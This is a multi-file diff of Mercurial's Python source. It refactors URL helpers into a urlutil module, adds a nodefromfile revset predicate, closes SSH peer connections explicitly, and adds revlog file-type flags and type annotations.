a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1,6 +1,6 @@ # revset.py - revision set queries for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -41,6 +41,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) # helpers for processing parsed tree @@ -1335,6 +1336,29 @@ return subset & rs +@predicate(b'nodefromfile(path)') +def nodefromfile(repo, subset, x): + """ + Read one node (hexadecimal hash) per line from the file at `path` and + return the corresponding revisions. Nodes unknown to the repository are + silently ignored; failing to open the file aborts. + """ + path = getstring(x, _(b"nodefromfile require a file path")) + listed_rev = set() + try: + with pycompat.open(path, 'rb') as f: + for line in f: + n = line.strip() + rn = _node(repo, n) + if rn is not None: + listed_rev.add(rn) + except IOError as exc: + m = _(b'cannot open nodes file "%s": %s') + m %= (path, encoding.strtolocal(exc.strerror)) + raise error.Abort(m) + return subset & baseset(listed_rev) + + @predicate(b'all()', safe=True) def getall(repo, subset, x): """All changesets, the same as ``0:tip``.""" @@ -1697,13 +1721,9 @@ return subset & names -@predicate(b'id(string)', safe=True) -def node_(repo, subset, x): - """Revision non-ambiguously specified by the given hex string prefix.""" - # i18n: "id" is a keyword - l = getargs(x, 1, 1, _(b"id requires one argument")) - # i18n: "id" is a keyword - n = getstring(l[0], _(b"id requires a string")) +def _node(repo, n): + """process a node input""" + rn = None if len(n) == 40: try: rn = repo.changelog.rev(bin(n)) except (LookupError, TypeError): rn = None else: - rn = None try: pm = scmutil.resolvehexnodeidprefix(repo, n) if pm is not None: @@ 
-1721,6 +1740,17 @@ pass except error.WdirUnsupported: rn = wdirrev + return rn + + +@predicate(b'id(string)', safe=True) +def node_(repo, subset, x): + """Revision non-ambiguously specified by the given hex string prefix.""" + # i18n: "id" is a keyword + l = getargs(x, 1, 1, _(b"id requires one argument")) + # i18n: "id" is a keyword + n = getstring(l[0], _(b"id requires a string")) + rn = _node(repo, n) if rn is None: return baseset() @@ -1825,27 +1855,28 @@ dest = ( l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) - if not dest: - # ui.paths.getpath() explicitly tests for None, not just a boolean - dest = None - path = repo.ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = path.branch, [] - - revs, checkout = hg.addbranchrevs(repo, repo, branches, []) - if revs: - revs = [repo.lookup(rev) for rev in revs] - other = hg.peer(repo, {}, dest) - repo.ui.pushbuffer() - outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) - repo.ui.popbuffer() + if dest: + dests = [dest] + else: + dests = [] + missing = set() + for path in urlutil.get_push_paths(repo, repo.ui, dests): + dest = path.pushloc or path.loc + branches = path.branch, [] + + revs, checkout = hg.addbranchrevs(repo, repo, branches, []) + if revs: + revs = [repo.lookup(rev) for rev in revs] + other = hg.peer(repo, {}, dest) + try: + repo.ui.pushbuffer() + outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) + repo.ui.popbuffer() + finally: + other.close() + missing.update(outgoing.missing) cl = repo.changelog - o = {cl.rev(r) for r in outgoing.missing} + o = {cl.rev(r) for r in missing} return subset & o @@ -2089,8 +2120,11 @@ if len(l) > 1: # i18n: "remote" is a keyword dest = getstring(l[1], _(b"remote requires a repository path")) - dest = repo.ui.expandpath(dest or 
b'default') - dest, branches = hg.parseurl(dest) + if not dest: + dest = b'default' + dest, branches = urlutil.get_unique_pull_path( + b'remote', repo, repo.ui, dest + ) other = hg.peer(repo, {}, dest) n = other.lookup(q) diff --git a/mercurial/revsetlang.py b/mercurial/revsetlang.py --- a/mercurial/revsetlang.py +++ b/mercurial/revsetlang.py @@ -1,6 +1,6 @@ # revsetlang.py - parser, tokenizer and utility for revision set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -1,6 +1,6 @@ # scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -181,17 +181,6 @@ encoding.strtolocal(inst.strerror), ) ) - except error.OutOfBandError as inst: - detailed_exit_code = 100 - if inst.args: - msg = _(b"abort: remote error:\n") - else: - msg = _(b"abort: remote error\n") - ui.error(msg) - if inst.args: - ui.error(b''.join(inst.args)) - if inst.hint: - ui.error(b'(%s)\n' % inst.hint) except error.RepoError as inst: ui.error(_(b"abort: %s\n") % inst) if inst.hint: @@ -201,7 +190,9 @@ msg = inst.args[1] if isinstance(msg, type(u'')): msg = pycompat.sysbytes(msg) - if not isinstance(msg, bytes): + if msg is None: + ui.error(b"\n") + elif not isinstance(msg, bytes): ui.error(b" %r\n" % (msg,)) elif not msg: ui.error(_(b" empty string\n")) @@ -229,6 +220,10 @@ detailed_exit_code = 20 elif isinstance(inst, error.ConfigError): detailed_exit_code = 30 + elif isinstance(inst, error.HookAbort): + detailed_exit_code = 40 + elif isinstance(inst, error.RemoteError): + detailed_exit_code = 100 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 elif isinstance(inst, error.CanceledError): diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -1,6 +1,6 @@ # server.py - utility and factory of server # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -22,7 +22,10 @@ util, ) -from .utils import procutil +from .utils import ( + procutil, + urlutil, +) def runservice( @@ -184,7 +187,7 @@ def _createhgwebservice(ui, repo, opts): # this way we can check if something was given in the command-line if opts.get(b'port'): - opts[b'port'] = util.getport(opts.get(b'port')) + opts[b'port'] = urlutil.getport(opts.get(b'port')) alluis = {ui} if repo: diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -286,8 +286,6 @@ ui, local, remote, - initialsamplesize=100, - fullsamplesize=200, abortwhenunrelated=True, ancestorsof=None, audit=None, @@ -315,7 +313,8 @@ ownheads = [rev for rev in cl.headrevs() if rev != nullrev] initial_head_exchange = ui.configbool(b'devel', b'discovery.exchange-heads') - + initialsamplesize = ui.configint(b'devel', b'discovery.sample-size.initial') + fullsamplesize = ui.configint(b'devel', b'discovery.sample-size') # We also ask remote about all the local heads. That set can be arbitrarily # large, so we used to limit it size to `initialsamplesize`. We no longer # do as it proved counter productive. The skipped heads could lead to a @@ -391,7 +390,7 @@ if audit is not None: audit[b'total-roundtrips'] = 1 - if cl.tip() == nullid: + if cl.tiprev() == nullrev: if srvheadhashes != [nullid]: return [nullid], True, srvheadhashes return [nullid], False, [] @@ -430,9 +429,12 @@ # full blown discovery # if the server has a limit to its arguments size, we can't grow the sample. 
- hard_limit_sample = remote.limitedarguments - grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample') - hard_limit_sample = hard_limit_sample and grow_sample + configbool = local.ui.configbool + grow_sample = configbool(b'devel', b'discovery.grow-sample') + grow_sample = grow_sample and not remote.limitedarguments + + dynamic_sample = configbool(b'devel', b'discovery.grow-sample.dynamic') + hard_limit_sample = not (dynamic_sample or remote.limitedarguments) randomize = ui.configbool(b'devel', b'discovery.randomize') disco = partialdiscovery( @@ -455,7 +457,7 @@ ui.debug(b"taking initial sample\n") samplefunc = disco.takefullsample targetsize = fullsamplesize - if not hard_limit_sample: + if grow_sample: fullsamplesize = int(fullsamplesize * samplegrowth) else: # use even cheaper initial sample diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -241,7 +241,7 @@ bin(h) for h in d[b'nodestoremove'].split(b' ') ] except (ValueError, TypeError, KeyError) as err: - raise error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) @classmethod def _getversion(cls, repo): @@ -250,7 +250,7 @@ try: version = int(fp.readline().strip()) except ValueError as err: - raise error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) finally: fp.close() return version @@ -534,7 +534,7 @@ parent = parents[0] origbranch = wctx.branch() - if parent.node() != nullid: + if parent.rev() != nullrev: desc = b"changes to: %s" % parent.description().split(b'\n', 1)[0] else: desc = b'(changes in empty repository)' @@ -812,7 +812,7 @@ with repo.lock(): checkparents(repo, state) ms = mergestatemod.mergestate.read(repo) - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.Abort( _(b"unresolved conflicts, can't continue"), hint=_(b"see 'hg resolve', then 'hg unshelve --continue'"), diff --git a/mercurial/similar.py 
b/mercurial/similar.py --- a/mercurial/similar.py +++ b/mercurial/similar.py @@ -1,6 +1,6 @@ # similar.py - mechanisms for finding similar files # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/simplemerge.py b/mercurial/simplemerge.py --- a/mercurial/simplemerge.py +++ b/mercurial/simplemerge.py @@ -19,7 +19,7 @@ from __future__ import absolute_import from .i18n import _ -from .node import nullid +from .node import nullrev from . import ( error, mdiff, @@ -402,31 +402,6 @@ return sl - def find_unconflicted(self): - """Return a list of ranges in base that are not conflicted.""" - am = mdiff.get_matching_blocks(self.basetext, self.atext) - bm = mdiff.get_matching_blocks(self.basetext, self.btext) - - unc = [] - - while am and bm: - # there is an unconflicted block at i; how long does it - # extend? until whichever one ends earlier. - a1 = am[0][0] - a2 = a1 + am[0][2] - b1 = bm[0][0] - b2 = b1 + bm[0][2] - i = intersect((a1, a2), (b1, b2)) - if i: - unc.append(i) - - if a2 < b2: - del am[0] - else: - del bm[0] - - return unc - def _verifytext(text, path, ui, opts): """verifies that text is non-binary (unless opts[text] is passed, @@ -452,7 +427,7 @@ def is_not_null(ctx): if not util.safehasattr(ctx, "node"): return False - return ctx.node() != nullid + return ctx.rev() != nullrev def _mergediff(m3, name_a, name_b, name_base): diff --git a/mercurial/smartset.py b/mercurial/smartset.py --- a/mercurial/smartset.py +++ b/mercurial/smartset.py @@ -1,6 +1,6 @@ # smartset.py - data structure for revision set # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -1,6 +1,6 @@ # sshpeer.py - ssh repository proxy class for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -24,6 +24,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -40,7 +41,7 @@ """display all data currently available on pipe as remote output. This is non blocking.""" - if pipe: + if pipe and not pipe.closed: s = procutil.readpipe(pipe) if s: display = ui.warn if warn else ui.status @@ -140,18 +141,26 @@ def close(self): return self._main.close() + @property + def closed(self): + return self._main.closed + def flush(self): return self._main.flush() -def _cleanuppipes(ui, pipei, pipeo, pipee): +def _cleanuppipes(ui, pipei, pipeo, pipee, warn): """Clean up pipes used by an SSH connection.""" - if pipeo: + didsomething = False + if pipeo and not pipeo.closed: + didsomething = True pipeo.close() - if pipei: + if pipei and not pipei.closed: + didsomething = True pipei.close() - if pipee: + if pipee and not pipee.closed: + didsomething = True # Try to read from the err descriptor until EOF. try: for l in pipee: @@ -161,6 +170,14 @@ pipee.close() + if didsomething and warn is not None: + # Encourage explicit close of sshpeers. Closing via __del__ is + # not very predictable when exceptions are thrown, which has led + # to deadlocks due to a peer being gc'ed in a fork + # We add our own stack trace, because the stacktrace when called + # from __del__ is useless. + ui.develwarn(b'missing close on SSH connection created at:\n%s' % warn) + def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None): """Create an SSH connection to a server. 
@@ -412,6 +429,7 @@ self._pipee = stderr self._caps = caps self._autoreadstderr = autoreadstderr + self._initstack = b''.join(util.getstackframes(1)) # Commands that have a "framed" response where the first line of the # response contains the length of that response. @@ -434,7 +452,7 @@ return True def close(self): - pass + self._cleanup() # End of ipeerconnection interface. @@ -452,10 +470,11 @@ self._cleanup() raise exception - def _cleanup(self): - _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee) + def _cleanup(self, warn=None): + _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee, warn=warn) - __del__ = _cleanup + def __del__(self): + self._cleanup(warn=self._initstack) def _sendrequest(self, cmd, args, framed=False): if self.ui.debugflag and self.ui.configbool( @@ -607,7 +626,7 @@ try: protoname, caps = _performhandshake(ui, stdin, stdout, stderr) except Exception: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise if protoname == wireprototypes.SSHV1: @@ -633,7 +652,7 @@ autoreadstderr=autoreadstderr, ) else: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise error.RepoError( _(b'unknown version of SSH protocol: %s') % protoname ) @@ -644,11 +663,11 @@ The returned object conforms to the ``wireprotov1peer.wirepeer`` interface. 
""" - u = util.url(path, parsequery=False, parsefragment=False) + u = urlutil.url(path, parsequery=False, parsefragment=False) if u.scheme != b'ssh' or not u.host or u.path is None: raise error.RepoError(_(b"couldn't parse location %s") % path) - util.checksafessh(path) + urlutil.checksafessh(path) if u.passwd is not None: raise error.RepoError(_(b'password in URL not supported')) diff --git a/mercurial/sslutil.py b/mercurial/sslutil.py --- a/mercurial/sslutil.py +++ b/mercurial/sslutil.py @@ -1,6 +1,6 @@ # sslutil.py - SSL handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # diff --git a/mercurial/stack.py b/mercurial/stack.py --- a/mercurial/stack.py +++ b/mercurial/stack.py @@ -1,6 +1,6 @@ # stack.py - Mercurial functions for stack definition # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -2,7 +2,7 @@ # # This provides read-only repo access to repositories exported via static http # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -12,6 +12,7 @@ import errno from .i18n import _ +from .node import sha1nodeconstants from . 
import ( branchmap, changelog, @@ -25,6 +26,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -161,7 +165,7 @@ self.ui = ui self.root = path - u = util.url(path.rstrip(b'/') + b"/.hg") + u = urlutil.url(path.rstrip(b'/') + b"/.hg") self.path, authinfo = u.authinfo() vfsclass = build_opener(ui, authinfo) @@ -172,6 +176,7 @@ self.names = namespaces.namespaces() self.filtername = None self._extrafilterid = None + self._wanted_sidedata = set() try: requirements = set(self.vfs.read(b'requires').splitlines()) @@ -197,6 +202,8 @@ requirements, supportedrequirements ) localrepo.ensurerequirementscompatible(ui, requirements) + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid # setup store self.store = localrepo.makestore(requirements, self.path, vfsclass) @@ -206,7 +213,7 @@ self._filecache = {} self.requirements = requirements - rootmanifest = manifest.manifestrevlog(self.svfs) + rootmanifest = manifest.manifestrevlog(self.nodeconstants, self.svfs) self.manifestlog = manifest.manifestlog( self.svfs, self, rootmanifest, self.narrowmatch() ) diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -1,6 +1,6 @@ # store.py - repository store handling for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,6 +10,7 @@ import errno import functools import os +import re import stat from .i18n import _ @@ -387,13 +388,58 @@ b'requires', ] +REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored') +REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored') +# files that are "volatile" and might change between listing and streaming +# +# note: the ".nd" file are nodemap data and won't "change" but they might be +# deleted. 
+REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd') -def isrevlog(f, kind, st): +# some exception to the above matching +EXCLUDED = re.compile(b'.*undo\.[^/]+\.nd?$') + + +def is_revlog(f, kind, st): if kind != stat.S_IFREG: - return False - if f[-2:] in (b'.i', b'.d', b'.n'): - return True - return f[-3:] == b'.nd' + return None + return revlog_type(f) + + +def revlog_type(f): + if f.endswith(REVLOG_FILES_MAIN_EXT): + return FILEFLAGS_REVLOG_MAIN + elif f.endswith(REVLOG_FILES_OTHER_EXT) and EXCLUDED.match(f) is None: + t = FILETYPE_FILELOG_OTHER + if f.endswith(REVLOG_FILES_VOLATILE_EXT): + t |= FILEFLAGS_VOLATILE + return t + + +# the file is part of changelog data +FILEFLAGS_CHANGELOG = 1 << 13 +# the file is part of manifest data +FILEFLAGS_MANIFESTLOG = 1 << 12 +# the file is part of filelog data +FILEFLAGS_FILELOG = 1 << 11 +# file that are not directly part of a revlog +FILEFLAGS_OTHER = 1 << 10 + +# the main entry point for a revlog +FILEFLAGS_REVLOG_MAIN = 1 << 1 +# a secondary file for a revlog +FILEFLAGS_REVLOG_OTHER = 1 << 0 + +# files that are "volatile" and might change between listing and streaming +FILEFLAGS_VOLATILE = 1 << 20 + +FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_MANIFESTLOG_OTHER = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_FILELOG_MAIN = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_FILELOG_OTHER = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_OTHER = FILEFLAGS_OTHER class basicstore(object): @@ -411,7 +457,7 @@ def join(self, f): return self.path + b'/' + encodedir(f) - def _walk(self, relpath, recurse, filefilter=isrevlog): + def _walk(self, relpath, recurse): '''yields (unencoded, encoded, size)''' path = self.path if relpath: @@ -425,30 +471,46 @@ p = visit.pop() for f, kind, st in readdir(p, stat=True): fp = p + b'/' + f - if 
filefilter(f, kind, st): + rl_type = is_revlog(f, kind, st) + if rl_type is not None: n = util.pconvert(fp[striplen:]) - l.append((decodedir(n), n, st.st_size)) + l.append((rl_type, decodedir(n), n, st.st_size)) elif kind == stat.S_IFDIR and recurse: visit.append(fp) l.sort() return l - def changelog(self, trypending): - return changelog.changelog(self.vfs, trypending=trypending) + def changelog(self, trypending, concurrencychecker=None): + return changelog.changelog( + self.vfs, + trypending=trypending, + concurrencychecker=concurrencychecker, + ) def manifestlog(self, repo, storenarrowmatch): - rootstore = manifest.manifestrevlog(self.vfs) + rootstore = manifest.manifestrevlog(repo.nodeconstants, self.vfs) return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch) def datafiles(self, matcher=None): - return self._walk(b'data', True) + self._walk(b'meta', True) + files = self._walk(b'data', True) + self._walk(b'meta', True) + for (t, u, e, s) in files: + yield (FILEFLAGS_FILELOG | t, u, e, s) def topfiles(self): # yield manifest before changelog - return reversed(self._walk(b'', False)) + files = reversed(self._walk(b'', False)) + for (t, u, e, s) in files: + if u.startswith(b'00changelog'): + yield (FILEFLAGS_CHANGELOG | t, u, e, s) + elif u.startswith(b'00manifest'): + yield (FILEFLAGS_MANIFESTLOG | t, u, e, s) + else: + yield (FILETYPE_OTHER | t, u, e, s) def walk(self, matcher=None): - """yields (unencoded, encoded, size) + """return file related to data storage (ie: revlogs) + + yields (file_type, unencoded, encoded, size) if a matcher is passed, storage files of only those tracked paths are passed with matches the matcher @@ -494,14 +556,14 @@ self.opener = self.vfs def datafiles(self, matcher=None): - for a, b, size in super(encodedstore, self).datafiles(): + for t, a, b, size in super(encodedstore, self).datafiles(): try: a = decodefilename(a) except KeyError: a = None if a is not None and not _matchtrackedpath(a, matcher): continue - yield 
a, b, size + yield t, a, b, size def join(self, f): return self.path + b'/' + encodefilename(f) @@ -690,7 +752,9 @@ continue ef = self.encode(f) try: - yield f, ef, self.getsize(ef) + t = revlog_type(f) + t |= FILEFLAGS_FILELOG + yield t, f, ef, self.getsize(ef) except OSError as err: if err.errno != errno.ENOENT: raise diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -20,6 +20,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, scmutil, store, util, @@ -83,7 +84,7 @@ # is advertised and contains a comma-delimited list of requirements. requirements = set() if remote.capable(b'stream'): - requirements.add(b'revlogv1') + requirements.add(requirementsmod.REVLOGV1_REQUIREMENT) else: streamreqs = remote.capable(b'streamreqs') # This is weird and shouldn't happen with modern servers. @@ -242,10 +243,12 @@ # Get consistent snapshot of repo, lock during scan. with repo.lock(): repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo): + for file_type, name, ename, size in _walkstreamfiles(repo): if size: entries.append((name, size)) total_bytes += size + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) repo.ui.debug( b'%d files, %d bytes to transfer\n' % (len(entries), total_bytes) @@ -592,6 +595,14 @@ fp.close() +def _test_sync_point_walk_1(repo): + """a function for synchronisation during tests""" + + +def _test_sync_point_walk_2(repo): + """a function for synchronisation during tests""" + + def generatev2(repo, includes, excludes, includeobsmarkers): """Emit content for version 2 of a streaming clone. 
@@ -615,9 +626,12 @@ matcher = narrowspec.match(repo.root, includes, excludes) repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo, matcher): + for rl_type, name, ename, size in _walkstreamfiles(repo, matcher): if size: - entries.append((_srcstore, name, _fileappend, size)) + ft = _fileappend + if rl_type & store.FILEFLAGS_VOLATILE: + ft = _filefull + entries.append((_srcstore, name, ft, size)) totalfilesize += size for name in _walkstreamfullstorefiles(repo): if repo.svfs.exists(name): @@ -634,6 +648,8 @@ chunks = _emit2(repo, entries, totalfilesize) first = next(chunks) assert first is None + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) return len(entries), totalfilesize, chunks diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1,6 +1,6 @@ # subrepo.py - sub-repository classes and factory # -# Copyright 2009-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -44,6 +44,7 @@ dateutil, hashutil, procutil, + urlutil, ) hg = None @@ -57,8 +58,8 @@ """ get a path or url and if it is a path expand it and return an absolute path """ - expandedpath = util.urllocalpath(util.expandpath(path)) - u = util.url(expandedpath) + expandedpath = urlutil.urllocalpath(util.expandpath(path)) + u = urlutil.url(expandedpath) if not u.scheme: path = util.normpath(os.path.abspath(u.path)) return path @@ -716,13 +717,17 @@ _(b'sharing subrepo %s from %s\n') % (subrelpath(self), srcurl) ) - shared = hg.share( - self._repo._subparent.baseui, - getpeer(), - self._repo.root, - update=False, - bookmarks=False, - ) + peer = getpeer() + try: + shared = hg.share( + self._repo._subparent.baseui, + peer, + self._repo.root, + update=False, + bookmarks=False, + ) + finally: + peer.close() self._repo = shared.local() else: # TODO: find a common place for this and this code in the @@ -741,26 +746,34 @@ self.ui.status( _(b'cloning subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) - other, cloned = hg.clone( - self._repo._subparent.baseui, - {}, - getpeer(), - self._repo.root, - update=False, - shareopts=shareopts, - ) + peer = getpeer() + try: + other, cloned = hg.clone( + self._repo._subparent.baseui, + {}, + peer, + self._repo.root, + update=False, + shareopts=shareopts, + ) + finally: + peer.close() self._repo = cloned.local() self._initrepo(parentrepo, source, create=True) self._cachestorehash(srcurl) else: self.ui.status( _(b'pulling subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) cleansub = self.storeclean(srcurl) - exchange.pull(self._repo, getpeer()) + peer = getpeer() + try: + exchange.pull(self._repo, peer) + finally: + peer.close() if cleansub: # keep the repo clean after pull self._cachestorehash(srcurl) @@ -837,15 +850,18 @@ if self.storeclean(dsturl): self.ui.status( _(b'no changes made 
to subrepo %s since last push to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) return None self.ui.status( _(b'pushing subrepo %s to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) - res = exchange.push(self._repo, other, force, newbranch=newbranch) + try: + res = exchange.push(self._repo, other, force, newbranch=newbranch) + finally: + other.close() # the repo is now clean self._cachestorehash(dsturl) @@ -857,7 +873,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.outgoing(ui, self._repo, dest, opts, subpath=subpath) @annotatesubrepoerror def incoming(self, ui, source, opts): @@ -865,7 +882,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.incoming(ui, self._repo, source, opts, subpath=subpath) @annotatesubrepoerror def files(self): @@ -1269,7 +1287,7 @@ args.append(b'%s@%s' % (state[0], state[1])) # SEC: check that the ssh url is safe - util.checksafessh(state[0]) + urlutil.checksafessh(state[0]) status, err = self._svncommand(args, failok=True) _sanitize(self.ui, self.wvfs, b'.svn') @@ -1567,7 +1585,7 @@ def _fetch(self, source, revision): if self._gitmissing(): # SEC: check for safe ssh url - util.checksafessh(source) + urlutil.checksafessh(source) source = self._abssource(source) self.ui.status( diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -1,6 +1,6 @@ # subrepoutil.py - sub-repository operations and substate handling # -# Copyright 2009-2010 Matt Mackall 
<mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -23,12 +23,36 @@ pycompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) nullstate = (b'', b'', b'empty') +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Dict, + List, + Optional, + Set, + Tuple, + ) + from . import ( + context, + localrepo, + match as matchmod, + scmutil, + subrepo, + ui as uimod, + ) + + Substate = Dict[bytes, Tuple[bytes, bytes, bytes]] + def state(ctx, ui): + # type: (context.changectx, uimod.ui) -> Substate """return a state dict, mapping subrepo paths configured in .hgsub to tuple: (source from .hgsub, revision from .hgsubstate, kind (key in types dict)) @@ -84,6 +108,7 @@ raise def remap(src): + # type: (bytes) -> bytes for pattern, repl in p.items(b'subpaths'): # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub # does a string decode. 
@@ -105,7 +130,7 @@ return src state = {} - for path, src in p[b''].items(): + for path, src in p.items(b''): # type: bytes kind = b'hg' if src.startswith(b'['): if b']' not in src: @@ -114,10 +139,10 @@ kind = kind[1:] src = src.lstrip() # strip any extra whitespace after ']' - if not util.url(src).isabs(): + if not urlutil.url(src).isabs(): parent = _abssource(repo, abort=False) if parent: - parent = util.url(parent) + parent = urlutil.url(parent) parent.path = posixpath.join(parent.path or b'', src) parent.path = posixpath.normpath(parent.path) joined = bytes(parent) @@ -136,6 +161,7 @@ def writestate(repo, state): + # type: (localrepo.localrepository, Substate) -> None """rewrite .hgsubstate in (outer) repo with these subrepo states""" lines = [ b'%s %s\n' % (state[s][1], s) @@ -146,6 +172,8 @@ def submerge(repo, wctx, mctx, actx, overwrite, labels=None): + # type: (localrepo.localrepository, context.workingctx, context.changectx, context.changectx, bool, Optional[Any]) -> Substate + # TODO: type the `labels` arg """delegated from merge.applyupdates: merging of .hgsubstate file in working context, merging context and ancestor context""" if mctx == actx: # backwards? 
